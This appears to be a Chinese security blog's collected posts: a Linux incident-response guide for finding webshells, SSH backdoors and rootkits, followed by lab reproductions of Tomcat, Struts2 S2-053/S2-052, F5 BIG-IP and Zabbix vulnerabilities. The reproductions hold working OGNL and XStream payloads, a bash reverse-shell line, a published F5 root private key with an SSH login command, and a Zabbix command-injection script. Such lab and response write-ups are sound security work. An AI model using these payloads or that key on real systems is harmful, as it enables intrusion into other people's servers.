特色文章

【应急响应】Linux应急响应姿势

1.Web服务
一般如果网络边界做好控制,通常对外开放的仅是Web服务,那么需要先找到Webshell,可以通过如下途径:
1)检查最近创建的php、jsp文件和上传目录
例如要查找24小时内被修改的JSP文件:

find ./ -mtime 0 -name "*.jsp"

2)使用Webshell查杀工具
Windows下D盾等,Linux下河马等。

3)与测试环境目录做对比

diff -r {生产dir} {测试dir}

4)创建Audit审计规则

vim /etc/audit/audit.rules
-a exclude,always -F msgtype=CONFIG_CHANGE
-a exit,always -F arch=b64 -F uid=48 -S execve -k webshell

产生日志如下:

type=SYSCALL msg=audit(1505888691.301:898615): arch=c000003e syscall=59 success=yes exit=0 a0=ca5188 a1=cb5ec8 a2=cb5008 a3=8 items=2 ppid=26159 pid=26160 auid=0 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=120028 comm="ls" exe="/bin/ls" subj=unconfined_u:system_r:httpd_t:s0 key="webshell"
type=EXECVE msg=audit(1505888691.301:898615): argc=1 a0="ls"
type=CWD msg=audit(1505888691.301:898615): cwd="/var/www/html/dvwa"
type=PATH msg=audit(1505888691.301:898615): item=0 name="/bin/ls" inode=2359385 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:bin_t:s0 nametype=NORMAL
type=PATH msg=audit(1505888691.301:898615): item=1 name=(null) inode=1441842 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 nametype=NORMAL

可以看到所在目录为/var/www/html/dvwa

具体Auditd的使用可以看我这篇文章

Linux下利用auditd监控JAVA执行命令并通过OSSEC告警

如果没有通过上述途径找到Webshell,可以通过Access Log获取一些信息。
1)扫描特征
通常日志中会伴随一些其他攻击特征,例如可以用如下语句

egrep '(select|script|acunetix|sqlmap)' /var/log/httpd/access_log

2)访问频次
重点关注POST请求

grep 'POST' /var/log/httpd/access_log | awk '{print $1}' | sort | uniq -c | sort -nr

3)Content-Length
Content-Length过大的请求,例如过滤Content-Length大于5M的日志

awk '{if($10>5000000){print $0}}' /var/log/httpd/access_log

注意
这里如果发现文件,不要直接用vim查看编辑文件内容,这样会更改文件的mtime,而对于应急响应来说,时间点很重要。对比时间点更容易在Log找到其他的攻击痕迹。

2.SSH服务
登录成功:

grep 'Accepted' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr

或者
last,它会读取位于/var/log/wtmp的文件

登录失败:

grep 'Failed' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr

或者
lastb,会读取位于/var/log/btmp的文件

检查SSH后门
1)比对ssh的版本
ssh -V
2)查看ssh配置文件和/usr/sbin/sshd的时间
stat /usr/sbin/sshd
3)strings检查/usr/sbin/sshd,看是否有邮箱信息
strings可以查看二进制文件中的字符串,在应急响应中是十分有用的。有些sshd后门会通过邮件发送登录信息,通过strings /usr/sbin/sshd可以查看到邮箱信息。
4)通过strace监控sshd进程读写文件的操作
一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。

ps axu | grep sshd | grep -v grep
root 65530 0.0 0.1 48428 1260 ? Ss 13:43 0:00 /usr/sbin/sshd
strace -o aa -ff -p 65530
grep open aa* | grep -v -e No -e null -e denied| grep WR
aa.102586:open("/tmp/ilog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 4

 

3.进程
检查是否存在可疑进程,需要注意如果攻击者获取到了Root权限,被植入内核或者系统层Rootkit的话,进程也会隐藏。
1)资源占用
Top然后找到CPU和MEM排序
2)启动时间
可疑与前面找到的Webshell时间点比对。
3)启动权限
这点很重要,比如某次应急中发现木马进程都是mysql权限执行的,如下所示:

mysql 63763 45.3 0.0 12284 9616 ? R 01:18 470:54 ./db_temp/dazui.4
mysql 63765 0.0 0.0 12284 9616 ? S 01:18 0:01 ./db_temp/dazui.4
mysql 63766 0.0 0.0 12284 9616 ? S 01:18 0:37 ./db_temp/dazui.4
mysql 64100 45.2 0.0 12284 9616 ? R 01:20 469:07 ./db_temp/dazui.4
mysql 64101 0.0 0.0 12284 9616 ? S 01:20 0:01 ./db_temp/dazui.4

那基本可以判断是通过Mysql入侵,重点排查Mysql弱口令、UDF提权等。
4)父进程
例如我在菜刀中反弹Bash

[root@server120 html]# ps -ef | grep '/dev/tcp' | grep -v grep
apache 26641 1014 0 14:59 ? 00:00:00 sh -c /bin/sh -c "cd /root/apache-tomcat-6.0.32/webapps/ROOT/;bash -i >& /dev/tcp/192.168.192.144/2345 0>&1;echo [S];pwd;echo [E]" 2>&1

父进程进程号1014

[root@server120 html]# ps -ef | grep 1014
apache 1014 1011 0 Sep19 ? 00:00:00 /usr/sbin/httpd

可以看到父进程为apache,就可以判断攻击者通过Web入侵。

获取到可疑进程号之后,可疑使用lsof -p pid查看相关文件和路径。

例如之前遇到的十字病毒,会修改ps和netstat显示的进程名称

udp 0 0 0.0.0.0:49937 0.0.0.0:* 131683/ls -la 
udp 0 0 0.0.0.0:47584 0.0.0.0:* 116515/ifconfig

使用lsof -p pid可以看到可执行文件

[root@DataNode105 admin]# lsof -p 131683
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
hahidjqzx 131683 root cwd DIR 8,98 4096 18087937 /root
hahidjqzx 131683 root rtd DIR 8,98 4096 2 /
hahidjqzx 131683 root txt REG 8,98 625622 24123895 /usr/bin/hahidjqzxs

可以文件类型可以使用file获取;

[root@server120 tmp]# file .zl
zl: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

对于二进制的文件可以使用strings读取可读字符

[root@server120 tmp]# strings .zl
rm -f /boot/IptabLes ; rm -f /boot/.IptabLes ; rm -f /boot/IptabLex ; rm -f /boot/.IptabLex ; rm -f /usr
/IptabLes ; rm -f /usr/.IptabLes ; rm -f /usr/IptabLex ; rm -f /usr/.IptabLex
netstat -anp | grep "IptabLes" |awk '{print $NF}' |cut -d "/" -f 1 | xargs kill -9 > /dev/null ;free -m 
> /dev/null
netstat -anp | grep "IptabLex" |awk '{print $NF}' |cut -d "/" -f 1 | xargs kill -9 > /dev/null ;free -m 
> /dev/null

例如之前应急遇到的命令替换,通过Strings查看发现有大量的IP地址。

[root@i-9kp9tipm log]# strings /usr/bin/.sshd | egrep '[1-9]{1,3}\.[1-9]{1,3}\.'
8.8.8.8
8.8.4.4
8.8.8.8
61.132.163.68
202.102.192.68
202.102.213.68
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3

4.网络连接
需要注意如果攻击者获取到了Root权限,被植入内核或者系统层Rootkit的话,连接是可以被隐藏的。

netstat -antlp | grep ESTABLISHED

查看已经建立的网络连接,例如反弹bash

[root@server120 html]# netstat -antlp | grep EST | grep bash
tcp 0 0 192.168.192.120:41320 192.168.192.144:2345 ESTABLISHED 26643/bash
netstat -antlp | grep LISTEN

检查可以监听端口,例如攻击者在本地开启sock5代理,然后使用SSH反弹sock5。

[root@server120 html]# netstat -antlp | grep LISTEN | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN 26810/python
lsof -i:{port}

5.敏感目录
/tmp, /var/tmp, /dev/shm,所有用户都可读,可写,可执行

[root@server120 ~]# ls -ald /tmp/
drwxrwxrwt. 10 root root 4096 9月 20 09:41 /tmp/
[root@server120 ~]# ls -ald /var/tmp/
drwxrwxrwt. 2 root root 4096 9月 18 16:57 /var/tmp/
[root@server120 ~]# ls -ald /dev/shm
drwxrwxrwt. 3 root root 60 9月 1 10:23 /dev/shm

6.history
默认的history仅记录执行的命令,然而这些对于应急来说是不够的,很多系统加固脚本会添加记录命令执行的时间,修改记录的最大条数。
另外之前写的关于Bash审计方式也很推荐,链接:

通过修改bash源码发送历史命令到ELK审计

7.开机启动

【应急响应】开机启动知识梳理

8.定时任务

【应急响应】定时任务知识梳理

9.Rootkit
检查命令替换
1)系统完整性可以通过rpm自带的-Va来校验检查所有的rpm软件包,有哪些被篡改了,防止rpm也被替换,上传一个安全干净稳定版本rpm二进制到服务器上进行检查。
例如我替换一下/bin/ps,然后使用rpm -qaV查看

[root@vincenthostname tmp]# rpm -qaV
S.?....T. /bin/ps

2)比对命令的大小
例如正常的ps和netstat大小

[root@vincent tmp]# ll /bin/ps
-rwxr-xr-x 1 root root 87112 11月 15 2012 /bin/ps
[root@vincent tmp]# ll /bin/netstat
-rwxr-xr-x 1 root root 128216 5月 10 2012 /bin/netstat

下面是其中有一次应急时的记录

[root@DataNode110 admin]# ls -alt /bin/ | head -n 10
total 10836
-rwxr-xr-x 1 root root 625633 Aug 17 16:26 tawlqkazpu
dr-xr-xr-x. 2 root root 4096 Aug 17 16:26 .
-rwxr-xr-x 1 root root 1223123 Aug 17 11:30 ps
-rwxr-xr-x 1 root root 1223123 Aug 17 11:30 netstat

可以看到ps和netstat是一样大的。
3)查看命令的修改时间,按修改时间排序

ls -alt /bin/ | head -n 5

4)使用chkrootkit和rkhunter查看

rkhunter与chkrootkit的安装测试(rootkit kbeast环境)

10.病毒检测

https://x.threatbook.cn/
http://www.virscan.org
https://www.virustotal.com/
https://fireeye.ijinshan.com/

11.文件权限

【文件和目录管理】setfacl与getfacl

【文件和目录管理】lsattr和chattr

 

Tomcat远程代码执行漏洞CVE-2017-12615

CVE号:
CVE-2017-12615

漏洞危害:

【安全加固】Tomcat限制不安全的HTTP方法


由上文得知Tomcat默认就是不允许使用PUT方法。
需要修改配置开启PUT方法,修改conf/web.xml,添加

<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

直接PUT上传Webshell。

一开始影响平台为Windows,受影响版本为Apache Tomcat 7.0.0 – 7.0.81。

复现过程如下
默认是无法上传jsp文件的

Windows环境下利用Windows 的特性。其一是 NTFS 文件流

其二是文件名的相关限制(如 Windows 中文件名不能以空格结尾)

后来披露Linux 和 Windows 服务器平台下从5.x到9.x全部的Tomcat版本都受影响,当 PUT 地址为/1.jsp/时,仍然会创建 JSP。
Windows下Apache Tomcat/8.0.46:

Linux下Apache Tomcat/8.0.46

这里有朋友问Nginx方向代理到Tomcat上,后端的Tomcat如果开启了PUT方法是否受影响,其实Nginx本身没有禁止PUT方法,所以还是会转发到后端,同样是受影响。

参考文章:
http://www.freebuf.com/vuls/148283.html

 

 

使用lshell构建受限的shell环境

Lshell用于构建一个受限的Shell环境,由Python编写,其功能如下:
1)限制可以使用的命令
2)记录用户执行的命令
3)限制可以访问的目录
4)限制环境变量
…..

安装步骤:
下载源码https://github.com/ghantoos/lshell
python setup.py install –no-compile –install-scripts=/usr/bin/
cp /etc/lshell.conf /usr/local/etc/

配置:
默认的配置文件中有Default配置,另外有可以创建[username]或者[grp:groupname]来定制用户的个性配置。
配置的优先级如下:
a.User配置
b.Group配置
c.Default配置

修改用户的shell环境:
chsh -s /usr/bin/lshell user_name

配置文件参数:

# lshell.py configuration file
#
# $Id: lshell.conf,v 1.27 2010-10-18 19:05:17 ghantoos Exp $

[global]
##  log directory (default /var/log/lshell/ )
logpath         : /var/log/lshell/
##  set log level to 0, 1, 2, 3 or 4  (0: no logs, 1: least verbose,
##                                                 4: log all commands)
loglevel        : 2
##  configure log file name (default is %u i.e. username.log)
#logfilename     : %y%m%d-%u
#logfilename     : syslog

##  in case you are using syslog, you can choose your logname
#syslogname      : myapp

##  Set path to sudo noexec library. This path is usually autodetected, only
##  set this variable to use alternate path. If set and the shared object is
##  not found, lshell will exit immediately. Otherwise, please check your logs
##  to verify that a standard path is detected.
##
##  while this should not be a common practice, setting this variable to an empty
##  string will disable LD_PRELOAD prepend of the commands. This is done at your
##  own risk, as lshell becomes easily breached using some commands like find(1)
##  using the -exec flag.
#path_noexec     : /usr/libexec/sudo_noexec.so

## include a directory containing multiple configuration files. These files
## can only contain default/user/group configuration. The global configuration will
## only be loaded from the default configuration file.
## e.g. splitting users into separate files
#include_dir     : /etc/lshell.d/*.conf

[default]
##  a list of the allowed commands without execution privileges or 'all' to
##  allow all commands in user's PATH
##
##  if  sudo(8) is installed and sudo_noexec.so is available, it will be loaded
##  before running every command, preventing it from  running  further  commands
##  itself. If not available, beware of commands like vim/find/more/etc. that
##  will allow users to execute code (e.g. /bin/sh) from within the application,
##  thus easily escaping lshell. See variable 'path_noexec' to use an alternative
##  path to library.
allowed         : ['ls', 'echo','ll']

##  A list of the allowed commands that are permitted to execute other
##  programs (e.g. shell scripts with exec(3)). Setting this variable to 'all'
##  is NOT allowed. Warning do not put here any command that can execute
##  arbitrary commands (e.g. find, vim, xargs)
##
##  Important: commands defined in 'allowed_shell_escape' override their
##  definition in the 'allowed' variable
#allowed_shell_escape        : ['man','zcat']

##  a list of forbidden character or commands
forbidden       : [';', '&', '|','`','>','<', '$(', '${']

##  a list of allowed command to use with sudo(8)
##  if set to ´all', all the 'allowed' commands will be accessible through sudo(8)
#sudo_commands   : ['ls', 'more']

##  number of warnings when user enters a forbidden value before getting 
##  exited from lshell, set to -1 to disable.
warning_counter : 2

##  command aliases list (similar to bash’s alias directive)
aliases         : {'ll':'ls -l'}

##  introduction text to print (when entering lshell)
#intro           : "== My personal intro ==\nWelcome to lshell\nType '?' or 'help' to get the list of allowed commands"

##  configure your promt using %u or %h (default: username)
#prompt          : "%u@%h"

##  set sort prompt current directory update (default: 0)
#prompt_short    : 0

##  a value in seconds for the session timer
#timer           : 5

##  list of path to restrict the user "geographicaly"
##  warning: many commands like vi and less allow to break this restriction
#path            : ['/home/bla/','/etc']

##  set the home folder of your user. If not specified the home_path is set to 
##  the $HOME environment variable
#home_path       : '/home/bla/'

##  update the environment variable $PATH of the user
#env_path        : ':/usr/local/bin:/usr/sbin'

##  a list of path; all executable files inside these path will be allowed 
#allowed_cmd_path: ['/home/bla/bin','/home/bla/stuff/libexec']

##  add environment variables
#env_vars        : {'foo':1, 'bar':'helloworld'}

##  allow or forbid the use of scp (set to 1 or 0)
#scp             : 1

## forbid scp upload
#scp_upload       : 0

## forbid scp download
#scp_download     : 0

##  allow of forbid the use of sftp (set to 1 or 0)
##  this option will not work if you are using OpenSSH's internal-sftp service
#sftp            : 1

##  list of command allowed to execute over ssh (e.g. rsync, rdiff-backup, etc.)
#overssh         : ['ls', 'rsync']

##  logging strictness. If set to 1, any unknown command is considered as 
##  forbidden, and user's warning counter is decreased. If set to 0, command is
##  considered as unknown, and user is only warned (i.e. *** unknown synthax)
strict          : 0

##  force files sent through scp to a specific directory
#scpforce        : '/home/bla/uploads/'

##  Enable support for WinSCP with scp mode (NOT sftp)
##  When enabled, the following parameters will be overridden:
##    - scp_upload: 1 (uses scp(1) from within session)
##    - scp_download: 1 (uses scp(1) from within session)
##    - scpforce - Ignore (uses scp(1) from within session)
##    - forbidden: -[';']
##    - allowed: +['scp', 'env', 'pwd', 'groups', 'unset', 'unalias']
#winscp: 0

##  history file maximum size 
#history_size     : 100

##  set history file name (default is /home/%u/.lhistory)
#history_file     : "/home/%u/.lshell_history"

##  define the script to run at user login
#login_script     : "/path/to/myscript.sh"

## disable user exit, this could be useful when lshell is spawned from another
## none-restricted shell (e.g. bash)
#disable_exit      : 0

配置例子:
foo:
1)可以访问/usr和/var,无法访问/usr/local
2)可以执行除了su以外的命令
3)家目录/home/users

bar:
1)可以访问/usr和/etc,无法访问/usr/local
2)除了default的命令还可以执行ping,无法执行ls
3)开启strict(1:表示每个unknown命令都会减少warning counter的数量;0:针对unknown命令只是提醒,不会减少warning counter的数量)

配置文件如下:

# CONFIGURATION START
[global]
logpath         : /var/log/lshell/
loglevel        : 2

[default]
allowed         : ['ls','pwd']
forbidden       : [';', '&', '|'] 
warning_counter : 2
timer           : 0
path            : ['/etc', '/usr']
env_path        : ':/sbin:/usr/foo'
scp             : 1 # or 0
sftp            : 1 # or 0
overssh         : ['rsync','ls']
aliases         : {'ls':'ls --color=auto','ll':'ls -l'}

[grp:users]
warning_counter : 5
overssh         : - ['ls']

[foo]
allowed         : 'all' - ['su']
path            : ['/var', '/usr'] - ['/usr/local']
home_path       : '/home/users'

[bar]
allowed         : + ['ping'] - ['ls'] 
path            : - ['/usr/local']
strict          : 1
scpforce        : '/home/bar/uploads/'
# CONFIGURATION END

【Struts2】S2-053

漏洞描述
当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞。
当在Freemarker标签中使用表达式常量或强制表达式时使用请求值可能会导致远程代码执行漏洞(见下面的示例)。
<@s.hidden name=”redirectUri” value=redirectUri />
<@s.hidden name=”redirectUri” value=”${redirectUri}” />
在这两种情况下,值属性都使用可写属性,都会受到Freemarker的表达式的影响。

CVE
CVE-2017-12611

受影响版本
Struts 2.0.1 – Struts 2.3.33
Struts 2.5 – Struts 2.5.10

漏洞测试

[root@mail ~]# systemctl start docker.service

下载Image

[root@mail ~]# docker pull medicean/vulapps:s_struts2_s2-053

列出镜像列表

[root@mail ~]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/medicean/vulapps s_struts2_s2-053 91603dee10fd 4 days ago 297.7 MB
docker.io/medicean/vulapps s_struts2_s2-052 dd0f12c42bc5 7 days ago 341.8 MB

启动容器

docker run -d -p 80:8080 91603dee10fd

查看当前运行的容器

[root@mail ~]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
7ad5e8fd7ae7 91603dee10fd "/usr/local/tomcat/bi" 2 minutes ago Up 2 minutes 0.0.0.0:80->8080/tcp peaceful_raman

POC

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream(),"GBK"))}

参考文章
http://anquan.360.cn/news/detail/4295.html

 

F5 BIG-IP remote root authentication bypass Vulnerability

CVE
CVE-2012-1493

漏洞危害
攻击者可以获取Root权限

漏洞影响如下产品和版本
* BIG-IP LTM 版本9.x, 10.x和11.x
* BIG-IP GTM 版本 9.x, 10.x和11.x
* BIG-IP ASM 版本 9.x, 10.x和11.x
* BIG-IP Link Controller 版本 9.x, 10.x和11.x
* BIG-IP PSM 版本 9.x, 10.x和11.x
* BIG-IP WOM 版本 10.x and 11.x
* BIG-IP APM 版本 10.x and 11.x
* BIG-IP Edge Gateway 版本 10.x和11.x
* BIG-IP Analytics 版本 11.x
* Enterprise Manager 版本 1.x和2.x

漏洞描述
F5的SSH对外开放且在上述版本可以使用私钥直接登录F5设备。

私钥如下

-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----

保存到my_private_key.txt

chomd 600 my_private_key.txt 
ssh -i my_private_key.txt -l root ipaddress

MSF插件

exploit/linux/ssh/f5_bigip_known_privkey

修复建议
https://support.f5.com/csp/article/K13600

Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability

今天openvas扫描到zabbix的一个漏洞

CVE号

CVE-2017-2824

漏洞描述

zabbix_server启动时会监听在10051端口,该端口如果对外开放,攻击者可以利用zabbix协议的command功能调用数据库中特定的脚本,只需要提供interface表中的hostid参数。在调用脚本时,{HOST.CONN}会被替换成表中的ip。由于插入的ip数据没有被过滤则将发生命令注入,严重时可以反弹shell等。
所以这里需要先在interface表中插入恶意指令,默认情况下,未经身份验证(需通过Zabbix授权)的攻击者无法做到这一点。要利用该漏洞还需要以下条件:配置好Action的自动发现功能,该功能可以将恶意的数据插入到interface表(配合Add host操作),从而可以进行命令注入攻击。

受影响版本
Zabbix 2.4.7 – 2.4.8r1

Zabbix安装
基础环境

yum install php php-mysql php-gd php-pear mysql mysql-server
groupadd zabbix
useradd -g zabbix zabbix
service mysqld start
service httpd start

Zabbix依赖

yum install -y curl curl-devel mydql-devel net-snmp snmp net-snmp-devel perl-DBI php-gd php-xml php-bcmath php-mbstring php-ldap php-odbc php-xmlrpc
tar -xvf zabbix-2.4.7.tar.gz

安装

cd zabbix-2.4.7/
./configure --prefix=/usr/local/zabbix --enable-server --enable-agent --enable-proxy --with-mysql --enable-net-snmp --with-libcurl 
make
make install

导入数据

mysql -uroot
>create database zabbix character set utf8 collate utf8_bin;
>use zabbix;
>source /root/zabbix-2.4.7/database/mysql/schema.sql
>source /root/zabbix-2.4.7/database/mysql/images.sql
>source /root/zabbix-2.4.7/database/mysql/data.sql

Web配置

cd frontends/php
cp -a . /var/www/html
cd /var/www/html/
chown apache:apache -R .

修改php.ini

post_max_size = 16M
max_execution_time = 300
max_input_time = 300
date.timezone = Asia/Shanghai
allow_url_fopen = On

访问http://172.16.100.181/setup.php进行安装,安装后默认登录凭证是Admin/zabbix

启动zabbix_server

cd /root/zabbix-2.4.7/misc/init.d/fedora/core
cp * /etc/init.d/

修改zabbix_server和zabbix_agentd

BASEDIR=/usr/local/zabbix

启动zabbix服务
配置Mysql连接
修改/usr/local/zabbix/etc/zabbix_server.conf

DBPassword=hehe123
DBSocket=/var/lib/mysql/mysql.sock

漏洞利用的数据表:

mysql> select * from interface;
+-------------+--------+------+------+-------+-----------+-----+-------+------+
| interfaceid | hostid | main | type | useip | ip | dns | port | bulk |
+-------------+--------+------+------+-------+-----------+-----+-------+------+
| 1 | 10084 | 1 | 1 | 1 | 127.0.0.1 | | 10050 | 1 |
+-------------+--------+------+------+-------+-----------+-----+-------+------+
1 row in set (0.00 sec)

mysql> select * from scripts;
+----------+-------------------------+----------------------------------------+-------------+----------+---------+-------------+--------------+------+------------+
| scriptid | name | command | host_access | usrgrpid | groupid | description | confirmation | type | execute_on |
+----------+-------------------------+----------------------------------------+-------------+----------+---------+-------------+--------------+------+------------+
| 1 | Ping | /bin/ping -c 3 {HOST.CONN} 2>&1 | 2 | NULL | NULL | | | 0 | 1 |
| 2 | Traceroute | /usr/bin/traceroute {HOST.CONN} 2>&1 | 2 | NULL | NULL | | | 0 | 1 |
| 3 | Detect operating system | sudo /usr/bin/nmap -O {HOST.CONN} 2>&1 | 2 | 7 | NULL | | | 0 | 1 |
+----------+-------------------------+----------------------------------------+-------------+----------+---------+-------------+--------------+------+------------+
3 rows in set (0.00 sec)

测试过程
添加Proxy
Administration > proxies > Create proxy

创建Action
configuration > action > Event source(Discovery)> Create Action配置好条件和操作,操作为Add host

import socket
import struct
import json

ZABBIX_HOST = "172.16.100.181"
ZABBIX_PORT = 10051

def send_to_zabbix(data):

    client = socket.socket()
    client.connect((ZABBIX_HOST,ZABBIX_PORT))
    packet = "ZBXD\x01" + struct.pack('<Q', len(data)) + data
    client.sendall(packet)

    head = client.recv(1024)
    if "ZBXD" not in head:
        client.close()
        return head
    pkt_len = struct.unpack('<Q', client.recv(8))
    data = client.recv(pkt_len[0])
    client.close()
    return data

data = """{"request":"command","scriptid":1,"hostid":10107}"""

discovery = """{
    "request": "discovery data",
    "host": "{上面配置的Proxy的名称}",
    "clock":1485353070,
    "data": [
        {
            "clock":1485353070,
            "drule":2,
            "dcheck":2,
            "type":0,
            "ip":";whoami > /tmp/pwned;",        
            "dns":"abc.com.cc",
            "port":10050,
            "key":"zzztest",
            "status":0,
            "value":"fuck"
        }
    ]
    }
"""

#利用自动发现功能添加Host,需要修改host的值为上面配置的Proxy的名称,执行成功会返回SUCCESS,也可以‘select * from interface;’ 查看是否自动添加成功
print send_to_zabbix(discovery)

# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
#利用命令注入进行攻击,这里需要爆破hostid,例如这里我添加到interfaceid=2中的恶意命令的条目的hostid是10106,然后会获取该ip,替换 {HOST.CONN}并执行。
print send_to_zabbix(data)

恶意命令成功插入到interface表中。

mysql> select * from interface;
+-------------+--------+------+------+-------+-----------------------+------------+-------+------+
| interfaceid | hostid | main | type | useip | ip                    | dns        | port  | bulk |
+-------------+--------+------+------+-------+-----------------------+------------+-------+------+
|           1 |  10084 |    1 |    1 |     1 | 127.0.0.1             |            | 10050 |    1 |
|           2 |  10106 |    1 |    1 |     1 | ;whoami > /tmp/pwned; | abc.com.cc | 10050 |    1 |
+-------------+--------+------+------+-------+-----------------------+------------+-------+------+
2 rows in set (0.00 sec)

[root@vincent tmp]# cat /tmp/pwned 
zabbix

修复建议
删除掉scripts表中三个默认脚本

参考文章
https://www.vulbox.com/knowledge/detail/?id=9
http://bobao.360.cn/news/detail/4142.html

Zabbix之前总结的漏洞:

Zabbix漏洞总结

 

 

【Struts2】S2-052

Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。Struts2启用了rest-plugin后并编写并设置了XStreamHandler后,可以导致远程命令执行这一严重问题。实际场景中存在一定局限性,需要满足一定条件,非struts本身默认开启的组件。

影响版本:
Version 2.5.0 to 2.5.12
Version 2.3.0 to 2.3.33

修复版本:
Struts 2.5.13
Struts 2.3.34

漏洞验证:
从struts2的官网下载最后受影响的版本struts-2.5.12,地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
部署项目struts2-rest-showcase.war,Edit后提交的时候,截断数据包。
修改Content-Type: application/xml
修改POST内容为:

<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/system32/calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>

弹出计算机

需要注意JDK版本为1.8,低版本的JDK测试不行。
POC command标签内的空格需要以分开是string标签形式。
例如touch /tmp/xxx
需要写成

<command> 
<string>touch</string>
<string>/tmp/xxx</string>
</command>

Linux下实际测试自己搭建环境(CentOS6.5 apache-tomcat-8.0.46)
创建文件可以

<command> 
<string>touch</string>
<string>/tmp/xxx</string>
</command>

但是使用如下POC无法反弹shell(只能发出连接,无法反弹Bash),不知道和环境是否有关系。

<command>
<string>bash</string>
<string>-c</string>
<string>bash -i >&amp; /dev/tcp/x.x.x.x/port 0>&amp;1</string>
</command>

还有测试过程如果不行可以清空tomcat目录下work目录再试试。

 

Linux下获取meterpreter
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
cp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/
msfconsole

msf > use exploit/multi/http/struts2_rest_xstream

msf exploit(struts2_rest_xstream) > set rhost 172.16.100.155
rhost => 172.16.100.155
